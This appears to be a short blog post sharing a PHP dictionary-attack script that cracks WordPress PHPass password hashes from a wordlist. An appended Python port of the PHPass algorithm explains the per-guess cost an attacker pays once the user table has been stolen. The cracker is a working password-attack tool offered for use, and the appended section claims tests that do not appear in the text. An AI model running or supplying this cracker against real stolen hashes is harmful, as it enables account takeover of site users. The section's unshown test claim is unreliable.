Wordpress PHPass hash bruteforce PHP script

Ok so I was a bit bored and was curious to know how WordPress handled its authentication. Turns out that it uses Solar Designer's PHPass class, so I've decided to write a very simple WordPress bruteforcer for it.

<?php
require_once('./class-phpass.php'); // available at http://www.openwall.com/phpass/

// Single quotes, so the $'s are not interpolated (in double quotes you would have to escape them)
$hash = '$P$BaahIvdhRXW8Q419WC/alyMUsY7S8I.';

// Same parameters WordPress uses in wp_hash_password(): cost 8, portable hashes
$wp_hasher = new PasswordHash(8, TRUE);

$handle = @fopen('wordlist.txt', 'r');
if ($handle)
{
  while (($pass = fgets($handle, 512)) !== false)
  {
    // strip the line ending (handles both LF and CRLF wordlists)
    $pass = rtrim($pass, "\r\n");

    if ($wp_hasher->CheckPassword($pass, $hash))
    {
      echo "FOUND: " . $hash . "=" . $pass . "\n";
      fclose($handle);
      exit;
    }
  }
  fclose($handle);
}
?>

It does seem to run a bit slow, but it serves its purpose. If there is enough demand for a faster version I'll consider writing one up, till then, peace.
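As an added illustration, not part of the original post, here is what CheckPassword actually computes, ported to Python from the PHPass portable-hash algorithm: the fourth character of the hash encodes the work factor, and WordPress's PasswordHash(8, TRUE) writes ITOA64[8 + 5], which is 'B', so every candidate tested against a '$P$B' hash costs one md5 of salt + password plus 8192 chained md5 calls. That cost, not the PHP loop, is why the script above is slow, and it is the same cost an attacker who stole the wp_users table pays per guess.

```python
import hashlib
import hmac

ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'  # PHPass alphabet

def encode64(data: bytes, count: int) -> str:
    """PHPass's own little-endian base64 with no padding (port of PasswordHash::encode64)."""
    out, i = '', 0
    while True:
        value = data[i]
        i += 1
        out += ITOA64[value & 0x3f]
        if i < count:
            value |= data[i] << 8
        out += ITOA64[(value >> 6) & 0x3f]
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out += ITOA64[(value >> 12) & 0x3f]
        if i >= count:
            break
        i += 1
        out += ITOA64[(value >> 18) & 0x3f]
        if i >= count:
            break
    return out

def phpass_cost(setting: str) -> int:
    """MD5 iterations encoded by the 4th character: WordPress's '$P$B' is ITOA64 index 13 -> 8192."""
    if setting[:3] not in ('$P$', '$H$'):  # '$H$' is the phpBB3-compatible identifier
        raise ValueError('not a PHPass portable hash')
    log2 = ITOA64.find(setting[3])
    if not 7 <= log2 <= 30:
        raise ValueError('cost character out of range')
    return 1 << log2

def phpass_crypt(password: bytes, setting: str) -> str:
    """Port of PasswordHash::crypt_private: md5(salt + pw), then `cost` rounds of md5(hash + pw)."""
    salt = setting[4:12]  # 8-character salt follows the '$P$' id and the cost character
    h = hashlib.md5(salt.encode() + password).digest()
    for _ in range(phpass_cost(setting)):
        h = hashlib.md5(h + password).digest()
    return setting[:12] + encode64(h, 16)

def check_password(password: bytes, stored: str) -> bool:
    """What PasswordHash::CheckPassword does, with a constant-time compare added."""
    return hmac.compare_digest(phpass_crypt(password, stored), stored)
```

The plaintext behind the hash quoted above is not known here, so the functions are exercised on a hash computed from a constructed password and on the cost character of the quoted hash.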

Filed under: security - No Pointless Response